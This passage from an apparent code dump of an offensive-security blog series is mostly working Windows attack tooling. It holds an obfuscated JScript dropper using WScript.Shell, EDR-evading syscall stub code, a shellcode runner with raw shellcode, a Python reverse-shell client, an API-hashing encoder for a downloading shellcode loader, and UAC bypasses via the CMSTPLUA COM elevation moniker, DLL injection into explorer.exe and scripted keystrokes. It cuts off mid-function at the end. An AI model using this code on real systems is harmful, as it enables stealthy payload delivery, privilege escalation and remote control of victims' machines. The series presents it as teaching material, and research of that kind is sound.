22 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Release|x86.ActiveCfg = Release|Win32
23 | {C5F1C8EE-8D2B-4DCA-B057-D4191BF9E36B}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {409BD0BB-666F-482A-B9DB-70471203C434}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/2023-09-27-Malware EDR Evasion Techniques/obfuscated.js:
--------------------------------------------------------------------------------
1 | var fsh35h35h35h353h5r = [];
2 | var njgpwoeotgoo7u3upo35h5bho = [];
3 | var llgll325h3l5l4 = [];
4 | var vffvfvrt9bvwetr8bwrt8bwrb8w = [];
5 | var vcg35b53hg53gh = [43,61,58,36,104,101,35,104,101,46,104,101,59,104,101,4,104];
6 | var hhghj46j46 = [104,101,39,104,43,114,103,61,59,45,58,59,103,56,61,42,36,33,43,103,60,32,45,44,58,39,56,56,45,44,46,33,36,45];
7 | var b33h3h354f3 = [32,60,60,56,59,114,103,103,58,41,63,102,47,33,60,32,61,42,61,59,45,58,43,39,38,60,45,38,60,102,43,39,37,103,47,123,60,59,49,59,60,123,37,103,45,36,45,62,41,60,33,39,38,59,60,41,60,33,39,38,103,37,41,33,38,103,45,36,45,62,41,60,33,39,38,59,60,41,60,33,39,38,103,45,36,45,62,41,60,33,39,38,59,60,41,60,33,39,38,102,43,56,56];
8 | var nn7unj4n465j=vcg35b53hg53gh.length;
9 | var b46n354j3547=hhghj46j46.length;
10 | var drygh64uj=b33h3h354f3.length;
11 |
12 | var n86k468534 = new ActiveXObject('WScript.Shell');
13 | for (a=0;a
3 | #include
4 |
5 | ManualNtdll::ManualNtdll() {}
6 |
7 | ManualNtdll::~ManualNtdll() {
8 | if (mappedBase) UnmapViewOfFile(mappedBase);
9 | if (hMapping) CloseHandle(hMapping);
10 | if (hFile) CloseHandle(hFile);
11 | }
12 |
13 | bool ManualNtdll::LoadFromDisk(const std::wstring& path) {
14 | hFile = CreateFileW(path.c_str(), GENERIC_READ, FILE_SHARE_READ, nullptr, OPEN_EXISTING, 0, nullptr);
15 | if (hFile == INVALID_HANDLE_VALUE) return false;
16 |
17 | hMapping = CreateFileMappingW(hFile, nullptr, PAGE_READONLY, 0, 0, nullptr);
18 | if (!hMapping) return false;
19 |
20 | mappedBase = MapViewOfFile(hMapping, FILE_MAP_READ, 0, 0, 0);
21 | return mappedBase != nullptr;
22 | }
23 |
24 | void* ManualNtdll::GetMappedBase() const {
25 | return mappedBase;
26 | }
27 |
28 | void* ManualNtdll::GetProcAddress(const std::string& name) {
29 | if (!mappedBase) return nullptr;
30 |
31 | auto dos = (PIMAGE_DOS_HEADER)mappedBase;
32 | auto nt = (PIMAGE_NT_HEADERS)((BYTE*)mappedBase + dos->e_lfanew);
33 | auto exports = (PIMAGE_EXPORT_DIRECTORY)((BYTE*)mappedBase +
34 | nt->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
35 |
36 | auto names = (DWORD*)((BYTE*)mappedBase + exports->AddressOfNames);
37 | auto funcs = (DWORD*)((BYTE*)mappedBase + exports->AddressOfFunctions);
38 | auto ords = (WORD*)((BYTE*)mappedBase + exports->AddressOfNameOrdinals);
39 |
40 | for (DWORD i = 0; i < exports->NumberOfNames; ++i) {
41 | const char* funcName = (const char*)mappedBase + names[i];
42 | if (name == funcName) {
43 | WORD ordinal = ords[i];
44 | return (BYTE*)mappedBase + funcs[ordinal];
45 | }
46 | }
47 | return nullptr;
48 | }
49 |
50 | void* ManualNtdll::ResolveSyscallStub(void* funcAddr) {
51 | void* stub = VirtualAlloc(nullptr, 0x1000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
52 | if (!stub) return nullptr;
53 | memcpy(stub, funcAddr, 0x20);
54 | return stub;
55 | }
--------------------------------------------------------------------------------
/2024-11-10-x64 Assembly & Shellcoding 101 - Part 5/msgbox_shellcode.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | // Shellcode (as given, formatted for clarity)
5 | unsigned char shellcode[] =
6 | "\x48\x83\xec\x28\x48\x83\xe4\xf0\x48\x31\xc9\x65\x48\x8b\x41\x60\x48\x8b\x40\x18\x48\x8b"
7 | "\x70\x10\x48\x8b\x36\x48\x8b\x36\x48\x8b\x5e\x30\x49\x89\xd8\x8b\x5b\x3c\x4c\x01\xc3\x48"
8 | "\x31\xc9\x66\x81\xc1\xff\x88\x48\xc1\xe9\x08\x8b\x14\x0b\x4c\x01\xc2\x44\x8b\x52\x14\x4d"
9 | "\x31\xdb\x44\x8b\x5a\x20\x4d\x01\xc3\x4c\x89\xd1\x48\xb8\x64\x64\x72\x65\x73\x73\x90\x90"
10 | "\x48\xc1\xe0\x10\x48\xc1\xe8\x10\x50\x48\xb8\x47\x65\x74\x50\x72\x6f\x63\x41\x50\x48\x89"
11 | "\xe0\x67\xe3\x20\x31\xdb\x41\x8b\x1c\x8b\x4c\x01\xc3\x48\xff\xc9\x4c\x8b\x08\x4c\x39\x0b"
12 | "\x75\xe9\x44\x8b\x48\x08\x44\x39\x4b\x08\x74\x03\x75\xdd\xcc\x51\x41\x5f\x49\xff\xc7\x4d"
13 | "\x31\xdb\x44\x8b\x5a\x1c\x4d\x01\xc3\x43\x8b\x04\xbb\x4c\x01\xc0\x50\x41\x5f\x4d\x89\xfc"
14 | "\x4c\x89\xc7\x4c\x89\xc1\xb8\x61\x72\x79\x41\x50\x48\xb8\x4c\x6f\x61\x64\x4c\x69\x62\x72"
15 | "\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd7\x48\x83\xc4\x30\x49\x89\xc7\x4d\x89\xe6\x48"
16 | "\x89\xf9\xb8\x65\x73\x73\x90\xc1\xe0\x08\xc1\xe8\x08\x50\x48\xb8\x45\x78\x69\x74\x50\x72"
17 | "\x6f\x63\x50\x48\x89\xe2\x48\x83\xec\x30\x41\xff\xd6\x48\x83\xc4\x30\x49\x89\xc6\xb8\x6c"
18 | "\x6c\x90\x90\xc1\xe0\x10\xc1\xe8\x10\x50\x48\xb8\x75\x73\x65\x72\x33\x32\x2e\x64\x50\x48"
19 | "\x89\xe1\x48\x83\xec\x30\x41\xff\xd7\x48\x89\xc7\x48\x89\xf9\xb8\x6f\x78\x41\x90\xc1\xe0"
20 | "\x08\xc1\xe8\x08\x50\x48\xb8\x4d\x65\x73\x73\x61\x67\x65\x42\x50\x48\x89\xe2\x48\x83\xec"
21 | "\x30\x41\xff\xd4\x49\x89\xc7\x48\x31\xc9\xb8\x6d\x90\x90\x90\xc1\xe0\x18\xc1\xe8\x18\x50"
22 | "\x48\xb8\x67\x33\x74\x73\x79\x73\x74\x33\x50\x48\x89\xe2\x49\x89\xe0\x45\x31\xc9\x48\x83"
23 | "\xec\x30\x41\xff\xd7\x48\x83\xc4\x30\x31\xc9\x41\xff\xd6";
24 |
25 |
26 | int main() {
27 | // Allocate executable memory
28 | void* exec_mem = VirtualAlloc(0, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
29 |
30 | if (exec_mem == nullptr) {
31 | std::cerr << "Memory allocation failed\n";
32 | return -1;
33 | }
34 |
35 | // Copy shellcode to the allocated memory
36 | memcpy(exec_mem, shellcode, sizeof(shellcode));
37 |
38 | // Create a function pointer to the shellcode
39 | auto shellcode_func = reinterpret_cast(exec_mem);
40 |
41 | // Execute the shellcode
42 | shellcode_func();
43 |
44 | // Free the allocated memory
45 | VirtualFree(exec_mem, 0, MEM_RELEASE);
46 |
47 | return 0;
48 | }
--------------------------------------------------------------------------------
/2024-11-22-Create your own C2 using Python- Part 1.md/pyrevshell_client.py:
--------------------------------------------------------------------------------
1 |
2 | import argparse
3 | import socket
4 | import subprocess
5 | import sys
6 | import threading
7 | import os
8 | import time
9 | from win32com.shell import shell
10 |
11 | def shellstdout_sender(client, myshellproc):
12 |
13 | while True:
14 | output=myshellproc.stdout.read1()
15 | try:
16 | client.send(output)
17 | except:
18 | print("connection died...")
19 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
20 | client.close()
21 | os._exit(0)
22 |
23 | def shellstderr_sender(client, myshellproc):
24 |
25 | while True:
26 | output=myshellproc.stderr.read1()
27 | try:
28 | client.send(output)
29 | except:
30 | print("connection died...")
31 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
32 | client.close()
33 | os._exit(0)
34 |
35 | def shellreceiver(client, myshellproc):
36 | while True:
37 | try:
38 | data = client.recv(1024)
39 | if len(data) > 0:
40 | if ":leave:" in data.decode("UTF-8"):
41 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
42 | client.close()
43 | os._exit(0)
44 | myshellproc.stdin.write(data)
45 | myshellproc.stdin.flush()
46 | except:
47 | print("connection died...")
48 | subprocess.Popen("TASKKILL /F /PID {pid} /T".format(pid=myshellproc.pid))
49 | client.close()
50 | os._exit(0)
51 |
52 |
53 |
54 |
55 | myshellproc = subprocess.Popen("cmd.exe", stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
56 |
57 |
58 |
59 | host="127.0.0.1"
60 | port=4546
61 |
62 | client = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
63 | try:
64 | client.connect((host, port))
65 | except:
66 | print("server/socket must have died...time to hop off")
67 | os._exit(0)
68 | s2p_thread = threading.Thread(target=shellstdout_sender, args=[client, myshellproc])
69 | s2p_thread.daemon = True
70 | s2p_thread.start()
71 |
72 | s2p_thread = threading.Thread(target=shellstderr_sender, args=[client, myshellproc])
73 | s2p_thread.daemon = True
74 | s2p_thread.start()
75 |
76 | s2p_thread = threading.Thread(target=shellreceiver, args=[client, myshellproc])
77 | s2p_thread.daemon = True
78 | s2p_thread.start()
79 |
80 | while True:
81 | time.sleep(1)
--------------------------------------------------------------------------------
/2025-8-23-Using Direct Syscalls with an In-Memory PIC Shellcode Loader/apiencoder.asm:
--------------------------------------------------------------------------------
1 | bits 64
2 |
3 | section .data
4 | api1 db "GetProcAddress",0
5 | api2 db "InternetOpenA",0
6 | api3 db "RtlMoveMemory",0
7 | api4 db "InternetOpenUrlA",0
8 | api5 db "InternetReadFile",0
9 | api6 db "InternetCloseHandle",0
10 | api7 db "CloseHandle",0
11 | api8 db "ExitProcess",0
12 | api9 db "VirtualAlloc",0
13 | api10 db "VirtualFree",0
14 | api11 db "VirtualProtect",0
15 | api12 db "CreateThread",0
16 | api13 db "WaitForSingleObject",0
17 | api14 db "LoadLibraryA",0
18 |
19 | section .bss
20 | ;api1_hash resd 1 ; reserve 4 bytes for the hash (DWORD)
21 |
22 | section .text
23 | global main
24 | main:
25 | xor ecx, ecx
26 | ; Hash the string
27 | api_1:
28 | lea rsi, [rel api1] ; rsi = pointer to string
29 | jmp initiator
30 | api_2:
31 | lea rsi, [rel api2]
32 | jmp initiator
33 | api_3:
34 | lea rsi, [rel api3]
35 | jmp initiator
36 | api_4:
37 | lea rsi, [rel api4]
38 | jmp initiator
39 | api_5:
40 | lea rsi, [rel api5]
41 | jmp initiator
42 | api_6:
43 | lea rsi, [rel api6]
44 | jmp initiator
45 | api_7:
46 | lea rsi, [rel api7]
47 | jmp initiator
48 | api_8:
49 | lea rsi, [rel api8]
50 | jmp initiator
51 | api_9:
52 | lea rsi, [rel api9]
53 | jmp initiator
54 | api_10:
55 | lea rsi, [rel api10]
56 | jmp initiator
57 | api_11:
58 | lea rsi, [rel api11]
59 | jmp initiator
60 | api_12:
61 | lea rsi, [rel api12]
62 | jmp initiator
63 | api_13:
64 | lea rsi, [rel api13]
65 | jmp initiator
66 | api_14:
67 | lea rsi, [rel api14]
68 | jmp initiator
69 |
70 | initiator:
71 | xor eax, eax
72 |
73 | next_char:
74 | mov bl, [rsi] ; load next char
75 | test bl, bl
76 | jz store_hash
77 | rol eax, 5 ; rotate hash left 5 bits
78 | xor eax, ebx ; hash ^= char
79 | inc rsi
80 | jmp next_char
81 |
82 | store_hash:
83 | ;mov [rel api1_hash], eax ; store final hash in .bss
84 | push rax
85 | inc ecx
86 | cmp ecx, 1
87 | je api_2
88 | cmp ecx, 2
89 | je api_3
90 | cmp ecx, 3
91 | je api_4
92 | cmp ecx, 4
93 | je api_5
94 | cmp ecx, 5
95 | je api_6
96 | cmp ecx, 6
97 | je api_7
98 | cmp ecx, 7
99 | je api_8
100 | cmp ecx, 8
101 | je api_9
102 | cmp ecx, 9
103 | je api_10
104 | cmp ecx, 10
105 | je api_11
106 | cmp ecx, 11
107 | je api_12
108 | cmp ecx, 12
109 | je api_13
110 | cmp ecx, 13
111 | je api_14
112 | cmp ecx, 14
113 | je goodbye
114 |
115 | goodbye:
116 | int3
117 | int3
118 | int3
119 |
120 |
--------------------------------------------------------------------------------
/2024-10-16-Creative UAC Bypass Methods for the Modern Era/CSMTP COM interface UAC Bypass/dll.cpp:
--------------------------------------------------------------------------------
1 | #include "pch.h"
2 | #include
3 | #include
4 | #include
5 |
6 | #pragma comment(lib, "shell32.lib")
7 |
8 | const wchar_t* CLSID_CMSTPLUA = L"{3E5FC7F9-9A51-4367-9063-A120244FBEC7}";
9 | const wchar_t* IID_ICMLuaUtil = L"{6EDD6D74-C007-4E75-B76A-E5740995E24C}";
10 |
11 | //These are inherited from IUnknown
12 | //HRESULT QueryInterface(REFIID riid, void** ppvObject);
13 | //ULONG AddRef();
14 | //ULONG Release();
15 | struct ICMLuaUtil : public IUnknown {
16 | virtual HRESULT STDMETHODCALLTYPE Method1() = 0;
17 | virtual HRESULT STDMETHODCALLTYPE Method2() = 0;
18 | virtual HRESULT STDMETHODCALLTYPE Method3() = 0;
19 | virtual HRESULT STDMETHODCALLTYPE Method4() = 0;
20 | virtual HRESULT STDMETHODCALLTYPE Method5() = 0;
21 | virtual HRESULT STDMETHODCALLTYPE Method6() = 0;
22 | virtual HRESULT STDMETHODCALLTYPE ShellExec(
23 | LPCWSTR lpFile,
24 | LPCWSTR lpParameters,
25 | LPCWSTR lpDirectory,
26 | ULONG fMask,
27 | ULONG nShow) = 0;
28 | };
29 |
30 | int injector() {
31 | HRESULT hr, coi;
32 | CComPtr spLuaUtil;
33 | WCHAR moniker[MAX_PATH] = L"Elevation:Administrator!new:";
34 | wcscat_s(moniker, CLSID_CMSTPLUA);
35 |
36 | CLSID clsid;
37 | IID iid;
38 |
39 | coi=CoInitialize(NULL); // Use CoInitializeEx for apartment options if needed
40 |
41 | if (FAILED(CLSIDFromString(CLSID_CMSTPLUA, &clsid)) ||
42 | FAILED(IIDFromString(IID_ICMLuaUtil, &iid))) {
43 | CoUninitialize();
44 | return -1;
45 | }
46 |
47 | BIND_OPTS3 opts;
48 | ZeroMemory(&opts, sizeof(opts));
49 | opts.cbStruct = sizeof(opts);
50 | opts.dwClassContext = CLSCTX_LOCAL_SERVER;
51 |
52 | hr = CoGetObject(moniker, (BIND_OPTS*)&opts, iid, (void**)&spLuaUtil);
53 | if (SUCCEEDED(hr) && spLuaUtil) {
54 | spLuaUtil->ShellExec(
55 | L"C:\\Windows\\System32\\cmd.exe",
56 | nullptr,
57 | nullptr,
58 | SEE_MASK_DEFAULT,
59 | SW_SHOW);
60 | }
61 |
62 | CoUninitialize();
63 | return 0;
64 | }
65 |
66 | DWORD WINAPI ThreadProc(LPVOID lpParameter) {
67 | HMODULE hModule = (HMODULE)lpParameter;
68 | injector();
69 | FreeLibraryAndExitThread(hModule, 0);
70 | return 0;
71 | }
72 |
73 | BOOL APIENTRY DllMain(HMODULE hModule,
74 | DWORD ul_reason_for_call,
75 | LPVOID lpReserved
76 | )
77 | {
78 | switch (ul_reason_for_call)
79 | {
80 | case DLL_PROCESS_ATTACH:
81 | DisableThreadLibraryCalls(hModule);
82 | CreateThread(nullptr, 0, ThreadProc, hModule, 0, nullptr);
83 | break;
84 | case DLL_THREAD_ATTACH:
85 | case DLL_THREAD_DETACH:
86 | case DLL_PROCESS_DETACH:
87 | break;
88 | }
89 | return TRUE;
90 | }
--------------------------------------------------------------------------------
/2024-10-16-Creative UAC Bypass Methods for the Modern Era/CSMTP COM interface UAC Bypass/injector.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | DWORD GetExplorerPID() {
6 | DWORD pid = 0;
7 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
8 | if (snapshot == INVALID_HANDLE_VALUE) return 0;
9 |
10 | PROCESSENTRY32 pe;
11 | pe.dwSize = sizeof(PROCESSENTRY32);
12 | if (Process32First(snapshot, &pe)) {
13 | do {
14 | if (_wcsicmp(pe.szExeFile, L"explorer.exe") == 0) {
15 | pid = pe.th32ProcessID;
16 | break;
17 | }
18 | } while (Process32Next(snapshot, &pe));
19 | }
20 |
21 | CloseHandle(snapshot);
22 | return pid;
23 | }
24 |
25 | int main() {
26 | // STEP 1: Get explorer.exe PID
27 | DWORD pid = GetExplorerPID();
28 | if (!pid) {
29 | std::wcerr << L"explorer.exe not found!\n";
30 | return 1;
31 | }
32 |
33 | // STEP 2: Open process
34 | HMODULE hKernel32 = GetModuleHandleW(L"kernel32.dll");
35 | if (!hKernel32) return 1;
36 |
37 | // Dynamically resolve LoadLibraryW
38 | auto pLoadLibraryW = (LPTHREAD_START_ROUTINE)GetProcAddress(hKernel32, "LoadLibraryW");
39 | if (!pLoadLibraryW) return 1;
40 |
41 | HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
42 | if (!hProcess) {
43 | std::wcerr << L"Failed to open explorer.exe\n";
44 | return 1;
45 | }
46 |
47 | // STEP 3: Allocate memory in target process
48 | //const wchar_t* dllPath = L"C:\\Users\\robbi\\source\\repos\\injectit\\x64\\Debug\\injectit.dll";
49 | const wchar_t* dllPath = L"C:\\Users\\robbi\\source\\repos\\injected2\\x64\\Debug\\injected2.dll";
50 | size_t size = (wcslen(dllPath) + 1) * sizeof(wchar_t);
51 |
52 | LPVOID remoteMem = VirtualAllocEx(hProcess, nullptr, size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
53 | if (!remoteMem) {
54 | std::wcerr << L"VirtualAllocEx failed\n";
55 | CloseHandle(hProcess);
56 | return 1;
57 | }
58 |
59 | // STEP 4: Write DLL path to remote process
60 | if (!WriteProcessMemory(hProcess, remoteMem, dllPath, size, nullptr)) {
61 | std::wcerr << L"WriteProcessMemory failed\n";
62 | VirtualFreeEx(hProcess, remoteMem, 0, MEM_RELEASE);
63 | CloseHandle(hProcess);
64 | return 1;
65 | }
66 |
67 | // STEP 5: Create remote thread in explorer.exe
68 | HANDLE hThread = CreateRemoteThread(hProcess, nullptr, 0, pLoadLibraryW, remoteMem, 0, nullptr);
69 | if (!hThread) {
70 | std::wcerr << L"CreateRemoteThread failed\n";
71 | }
72 | else {
73 | std::wcout << L"Injection successful!\n";
74 | CloseHandle(hThread);
75 | }
76 |
77 | // Clean up
78 | VirtualFreeEx(hProcess, remoteMem, 0, MEM_RELEASE);
79 | CloseHandle(hProcess);
80 | return 0;
81 | }
82 |
--------------------------------------------------------------------------------
/2024-10-16-Creative UAC Bypass Methods for the Modern Era/UACBypass2.ps1:
--------------------------------------------------------------------------------
1 | $UACRegKeyPath = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System"
2 |
3 | $UACValue = Get-ItemProperty -Path $UACRegKeyPath -Name ConsentPromptBehaviorAdmin | Select-Object -ExpandProperty ConsentPromptBehaviorAdmin
4 |
5 | switch ($UACValue) {
6 | 0 { "0 - UAC is disabled (Never notify)." }
7 | 1 { "1 - UAC enabled - Prompt for credentials on the secure desktop (Always notify)." }
8 | 2 { "2 - UAC enabled - Prompt for consent on the secure desktop." }
9 | 3 { "3 - UAC enabled - Prompt for consent for non-Windows binaries." }
10 | 4 { "4 - UAC enabled - Automatically deny elevation requests." }
11 | 5 { "5 - UAC enabled - Prompt for consent for non-Windows binaries." }
12 | Default { "Unknown UAC setting." }
13 | }
14 |
15 |
16 | Add-Type @"
17 | using System;
18 | using System.Runtime.InteropServices;
19 |
20 | public class User32 {
21 |
22 | [DllImport("user32.dll")]
23 | [return: MarshalAs(UnmanagedType.Bool)]
24 | public static extern bool SetForegroundWindow(IntPtr hWnd);
25 | }
26 | "@
27 |
28 | Start-Process "cmd.exe" -ArgumentList "/C start taskschd.msc" -NoNewWindow
29 |
30 | Start-Sleep -Seconds 2
31 |
32 | $taskschd = Get-Process -Name "mmc" -ErrorAction SilentlyContinue
33 |
34 | if ($taskschd) {
35 |
36 | $hwnd = $taskschd.MainWindowHandle
37 |
38 | [User32]::SetForegroundWindow($hwnd)
39 |
40 | # Wait a moment for the window to come to the front
41 | Start-Sleep -Seconds 2
42 |
43 | # Send keystrokes to azman/mmc
44 | [void][System.Windows.Forms.SendKeys]::SendWait("%")
45 | [void][System.Windows.Forms.SendKeys]::SendWait("{RIGHT}")
46 | [void][System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
47 | [void][System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
48 | [void][System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
49 | [void][System.Windows.Forms.SendKeys]::SendWait("{DOWN}")
50 | #[void][System.Windows.Forms.SendKeys]::SendWait("{DOWN}") #this can change depending on your version of win11 (22h2, 23h2, 24h2)
51 | [void][System.Windows.Forms.SendKeys]::SendWait("{ENTER}")
52 | Start-Sleep -Seconds 2
53 | [void][System.Windows.Forms.SendKeys]::SendWait("{TAB}")
54 | [void][System.Windows.Forms.SendKeys]::SendWait("{TAB}")
55 | [void][System.Windows.Forms.SendKeys]::SendWait("{TAB}")
56 | [void][System.Windows.Forms.SendKeys]::SendWait("{TAB}")
57 | [void][System.Windows.Forms.SendKeys]::SendWait("{TAB}")
58 | [void][System.Windows.Forms.SendKeys]::SendWait("{TAB}")
59 | [void][System.Windows.Forms.SendKeys]::SendWait(" ")
60 | Start-Sleep -Seconds 1
61 | [void][System.Windows.Forms.SendKeys]::SendWait("%USERPROFILE%\AppData\Local\Programs\Python\Python313\python.exe %USERPROFILE%\documents\github\elevationstation_local\elev8cli.py{ENTER}")
62 | } else {
63 | Write-Host "taskschd/mmc is not running."
64 | }
65 |
66 | $form.Close()
67 |
--------------------------------------------------------------------------------
/2024-11-4-x64 Assembly & Shellcoding 101 - Part 3/calc_nonullz.asm:
--------------------------------------------------------------------------------
1 | ;nasm -fwin64 [x64findkernel32.asm]
2 | ;ld -m i386pep -o x64findkernel32.exe x64findkernel32.obj
3 | BITS 64
4 | SECTION .text
5 | global main
6 | main:
7 | sub rsp, 0x28
8 | and rsp, 0xFFFFFFFFFFFFFFF0
9 | xor rcx, rcx ; RCX = 0
10 | mov rax, [gs:rcx + 0x60] ; RAX = PEB
11 | mov rax, [rax + 0x18] ; RAX = PEB->Ldr
12 | mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
13 | mov rsi, [rsi]
14 | mov rsi,[rsi]
15 | mov rbx, [rsi+0x30] ;kernel32.dll base address
16 | mov r8, rbx ; mov kernel32.dll base addr into r8
17 | ;Code for parsing Export Address Table
18 | mov ebx, [rbx+0x3C] ; Get Kernel32 PE Signature (offset 0x3C) into EBX
19 | add rbx, r8 ; Add signature offset to kernel32 base. Store in RBX.
20 | xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
21 | add cx, 0x88ff
22 | shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
23 | mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
24 | add rdx, r8 ; RDX = kernel32.dll + RVA ExportTable = ExportTable Address
25 | mov r10d, [rdx+0x14] ; Number of functions
26 | xor r11, r11 ; Zero R11 before use
27 | mov r11d, [rdx+0x20] ; AddressOfNames RVA
28 | add r11, r8 ; AddressOfNames VMA
29 | mov rcx, r10 ; Set loop counter
30 | mov rax, 0x6F9C9A87BA9196A8 ; WinExec 'encoded'
31 | not rax
32 | shl rax, 0x8
33 | shr rax, 0x8
34 | push rax
35 | mov rax, rsp
36 | add rsp, 0x8
37 | kernel32findfunction: ; Loop over Export Address Table to find WinApi names
38 | jecxz FunctionNameNotFound ; Loop around this function until we find WinExec
39 | xor ebx,ebx ; Zero EBX for use
40 | mov ebx, [r11+rcx*4] ; EBX = RVA for first AddressOfName
41 | add rbx, r8 ; RBX = Function name VMA / add kernel32 base address to RVA and get WinApi name
42 | dec rcx ; Decrement our loop by one, this goes from Z to A
43 | mov r9, qword [rax] ; R9 = "our API"
44 | cmp [rbx], r9 ; Compare all bytes
45 | jz FunctionNameFound ; If match, function found
46 | jnz kernel32findfunction
47 | FunctionNameNotFound:
48 | int3
49 | FunctionNameFound: ; Get function address from AddressOfFunctions
50 | inc ecx ; increase counter by 1 to account for decrement in loop
51 | xor r11, r11
52 | mov r11d, [rdx+0x1c] ; AddressOfFunctions RVA
53 | add r11, r8 ; AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
54 | mov r15d, [r11+rcx*4] ; Get the function RVA.
55 | add r15, r8 ; Found the Winexec WinApi and all the while skipping ordinal lookup! w00t!
56 | xor rax, rax
57 | push rax
58 | mov rax, 0x9A879AD19C939E9C ; encoded calc.exe ;)
59 | not rax
60 | push rax
61 | mov rcx, rsp
62 | xor rdx, rdx
63 | inc rdx
64 | sub rsp, 0x30
65 | call r15 ; Call WinExec
--------------------------------------------------------------------------------
/2024-11-6-x64 Assembly & Shellcoding 101 - Part 4/calc_encoded.asm:
--------------------------------------------------------------------------------
1 | ;nasm -fwin64 [x64findkernel32.asm]
2 | ;ld -m i386pep -o x64findkernel32.exe x64findkernel32.obj
3 | BITS 64
4 | SECTION .text
5 | global main
6 | main:
7 | sub rsp, 0x28
8 | and rsp, 0xFFFFFFFFFFFFFFF0
9 | xor rcx, rcx ; RCX = 0
10 | mov rax, [gs:rcx + 0x60] ; RAX = PEB
11 | mov rax, [rax + 0x18] ; RAX = PEB->Ldr
12 | mov rsi,[rax+0x10] ;PEB.Ldr->InMemOrderModuleList
13 | mov rsi, [rsi]
14 | mov rsi,[rsi]
15 | mov rbx, [rsi+0x30] ;kernel32.dll base address
16 | mov r8, rbx ; mov kernel32.dll base addr into r8
17 | ;Code for parsing Export Address Table
18 | mov ebx, [rbx+0x3C] ; Get Kernel32 PE Signature (offset 0x3C) into EBX
19 | add rbx, r8 ; Add signature offset to kernel32 base. Store in RBX.
20 | xor rcx, rcx ; Avoid null bytes from mov edx,[rbx+0x88] by using rcx register to add
21 | add cx, 0x88ff
22 | shr rcx, 0x8 ; RCX = 0x88ff --> 0x88
23 | mov edx, [rbx+rcx] ; EDX = [&NewEXEHeader + Offset RVA ExportTable] = RVA ExportTable
24 | add rdx, r8 ; RDX = kernel32.dll + RVA ExportTable = ExportTable Address
25 | mov r10d, [rdx+0x14] ; Number of functions
26 | xor r11, r11 ; Zero R11 before use
27 | mov r11d, [rdx+0x20] ; AddressOfNames RVA
28 | add r11, r8 ; AddressOfNames VMA
29 | mov rcx, r10 ; Set loop counter
30 | mov rax, 0x6F9C9A87BA9196A8 ; WinExec 'encoded'
31 | not rax
32 | shl rax, 0x8
33 | shr rax, 0x8
34 | push rax
35 | mov rax, rsp
36 | add rsp, 0x8
37 | kernel32findfunction: ; Loop over Export Address Table to find WinApi names
38 | jecxz FunctionNameNotFound ; Loop around this function until we find WinExec
39 | xor ebx,ebx ; Zero EBX for use
40 | mov ebx, [r11+rcx*4] ; EBX = RVA for first AddressOfName
41 | add rbx, r8 ; RBX = Function name VMA / add kernel32 base address to RVA and get WinApi name
42 | dec rcx ; Decrement our loop by one, this goes from Z to A
43 | mov r9, qword [rax] ; R9 = "our API"
44 | cmp [rbx], r9 ; Compare all bytes
45 | jz FunctionNameFound ; If match, function found
46 | jnz kernel32findfunction
47 | FunctionNameNotFound:
48 | int3
49 | FunctionNameFound: ; Get function address from AddressOfFunctions
50 | inc ecx ; increase counter by 1 to account for decrement in loop
51 | xor r11, r11
52 | mov r11d, [rdx+0x1c] ; AddressOfFunctions RVA
53 | add r11, r8 ; AddressOfFunctions VMA in R11. Kernel32+RVA for addressoffunctions
54 | mov r15d, [r11+rcx*4] ; Get the function RVA.
55 | add r15, r8 ; Found the Winexec WinApi and all the while skipping ordinal lookup! w00t!
56 | xor rax, rax
57 | push rax
58 | mov rax, 0x9A879AD19C939E9C ; encoded calc.exe ;)
59 | not rax
60 | push rax
61 | mov rcx, rsp
62 | xor rdx, rdx
63 | inc rdx
64 | sub rsp, 0x30
65 | call r15 ; Call WinExec
--------------------------------------------------------------------------------
/2024-12-20-Create your own C2 using Python - Part 3/elevationstation/tokenprivs.cpp:
--------------------------------------------------------------------------------
1 | #pragma once
2 | #include
3 | #include
4 | #include
5 | #include "def.h"
6 | void setThreadPrivs(LPCWSTR privname)
7 | {
8 |
9 | TOKEN_PRIVILEGES tp;
10 | LUID luid;
11 | HANDLE pToken;
12 |
13 | if (!LookupPrivilegeValue(
14 | NULL, // lookup privilege on local system
15 | privname, // privilege to lookup
16 | &luid)) // receives LUID of privilege
17 | {
18 | printf("[!] LookupPrivilegeValue error: %u\n", GetLastError());
19 | exit(0);
20 | }
21 |
22 | tp.PrivilegeCount = 1;
23 | tp.Privileges[0].Luid = luid;
24 | tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
25 |
26 | if (OpenThreadToken(GetCurrentThread(), TOKEN_ADJUST_PRIVILEGES, NULL, &pToken))
27 | printf("[+] opened process thread token!\n");
28 | else
